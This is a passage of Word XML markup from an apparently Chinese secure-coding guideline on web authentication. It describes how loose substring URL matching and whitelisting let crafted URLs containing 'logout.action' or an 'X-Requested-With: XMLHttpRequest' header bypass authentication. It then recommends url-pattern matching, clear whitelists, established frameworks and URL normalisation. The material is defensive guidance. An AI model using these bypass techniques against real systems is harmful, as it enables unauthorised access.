    </w:p>
    <w:p w:rsidR="00DF7231" w:rsidRDefault="00DF7231" w:rsidP="00B83215">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品目前</w:t>
      </w:r>
      <w:r w:rsidR="00910745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不一致且比较简单（有些是关键字从头匹配，有些是关键字从结尾匹配，有些是关键字从中间匹配）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00910745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidR="00E04B1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00910745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00E04B1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00910745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidR="00E04B1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00910745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等函数，只是做部分特征的模式匹配。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品</w:t>
      </w:r>
      <w:r w:rsidR="00873EFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用标准的匹配机制（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D84D26">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D84D26">
        <w:t xml:space="preserve">-pattern </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。梳理并规划</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将需要登录才能访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与不需要登录就能访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分离。对于需要登录才能访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D84D26">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D84D26">
        <w:t>-pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="00701B63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽量精确的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293B2E" w:rsidRDefault="004C4E08" w:rsidP="004C4E08">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidR="005073E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、鉴权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>白名单</w:t>
      </w:r>
      <w:r w:rsidR="00293B2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置不合理</w:t>
      </w:r>
      <w:r w:rsidR="00D17F34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或有遗漏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C4E08" w:rsidRDefault="00587D1A" w:rsidP="00F541A2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品在应用系统中有一些页面和资源是允许匿名访问的（如常见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态文件），也就不需要进行认证和鉴权，对这样的匿名访问资源系统中维护有一份白名单列表，产品对白名单设置不合理，导致系统漏洞。如案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>logout.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidR="0076441D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需认证就可以访问，</w:t>
      </w:r>
      <w:r w:rsidR="00784A89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且匹配规则不严谨，导致恶意构造的</w:t>
      </w:r>
      <w:r w:rsidR="00784A89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00784A89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中含有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00784A89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>logout.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F57EBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特征</w:t>
      </w:r>
      <w:r w:rsidR="00887C52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F57EBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过了正常认证机制。</w:t>
      </w:r>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ajax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求做了例外处理，认为无需鉴权，且判断依据只是</w:t>
      </w:r>
      <w:r w:rsidR="00E04334">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求头中</w:t>
      </w:r>
      <w:r w:rsidR="00E04334">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否存在</w:t>
      </w:r>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E04334" w:rsidRPr="00E04334">
        <w:t xml:space="preserve">X-Requested-With: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E04334" w:rsidRPr="00E04334">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E04334" w:rsidRPr="00E04334">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E20347">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="005073E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品</w:t>
      </w:r>
      <w:r w:rsidR="00873EFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须</w:t>
      </w:r>
      <w:r w:rsidR="00387878">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>梳理</w:t>
      </w:r>
      <w:r w:rsidR="005073E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidR="005073E5" w:rsidRPr="00195C3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可匿名访问的页面和资源，确认这些页面和资源是否会泄露敏感数据</w:t>
      </w:r>
      <w:r w:rsidR="005073E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，被匿名访问是否合理</w:t>
      </w:r>
      <w:r w:rsidR="005073E5" w:rsidRPr="00195C3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="005073E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于需要控制访问权限的页面和资源，确认是否都做了合理的权限检查，是否有遗漏权限检查的页面和资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C555E5" w:rsidRDefault="00C555E5" w:rsidP="00C555E5">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐解决方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F7816" w:rsidRDefault="009A6549">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>前置条件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F7816" w:rsidRDefault="00873EFC">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将允许匿名访问</w:t>
      </w:r>
      <w:r w:rsidR="00DC35A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（不需认证）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（如常见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态文件）</w:t>
      </w:r>
      <w:r w:rsidR="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>梳理清</w:t>
      </w:r>
      <w:r w:rsidR="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>楚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，维护一份</w:t>
      </w:r>
      <w:r w:rsidR="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清晰的</w:t>
      </w:r>
      <w:r w:rsidR="009A6549" w:rsidRPr="009A6549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>可匿名访问的页面</w:t>
      </w:r>
      <w:r w:rsidR="009A6549" w:rsidRPr="009A6549">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="009A6549" w:rsidRPr="009A6549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>资源白名单列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F7816" w:rsidRDefault="00F55B2C">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将允许无需鉴权</w:t>
      </w:r>
      <w:r w:rsidR="00F81D48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（所有认证用户都有权限访问）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可访问的</w:t>
      </w:r>
      <w:r w:rsidR="00F81D48" w:rsidRPr="00F81D48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="00F81D48" w:rsidRPr="00F81D48">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00F81D48" w:rsidRPr="00F81D48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>梳理清楚，维护一份清晰的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>无需鉴权即可访问的</w:t>
      </w:r>
      <w:r w:rsidR="00C64056" w:rsidRPr="009A6549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="00C64056" w:rsidRPr="009A6549">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C64056" w:rsidRPr="009A6549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55B2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>白名单列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F7816" w:rsidRDefault="003F7816">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C555E5" w:rsidRDefault="00FB6C3D" w:rsidP="005E040A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="10210" w:dyaOrig="10096">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:414.7pt;height:381.3pt" o:ole="">
            <v:imagedata r:id="rId20" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1499847734" r:id="rId21"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5392A" w:rsidRPr="00D5392A" w:rsidRDefault="00D5392A" w:rsidP="00D5392A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5392A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>认证、鉴权、会话管理，是WEB系统典型的场景，请优先使用</w:t>
      </w:r>
      <w:r w:rsidR="008D465C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Web容器、开发框架和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5392A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一些业界成熟的</w:t>
      </w:r>
      <w:r w:rsidR="008D465C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5392A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">（如Spring Security、Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shiro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等）</w:t>
      </w:r>
      <w:r w:rsidR="008D465C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>提供的机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5392A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>尽量避免自研认证、鉴权、会话管理模块，如果因为特殊原因需要自研，请遵照上图推荐的业务处理流程和方法，处理用户认证、鉴权流程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005673BB" w:rsidRDefault="00056A80" w:rsidP="00056A80">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRDefault="00A10490" w:rsidP="00A10490">
      <w:r w:rsidRPr="00BA07C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Java语言：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA07C9">
        <w:t>request.getContextPath()+request.getServletPath()+request.getPathInfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E648F5">
        <w:t>request.getRequestURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E648F5">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E648F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E648F5">
        <w:t>request.getRequestUR</w:t>
      </w:r>
      <w:r w:rsidRPr="00E648F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
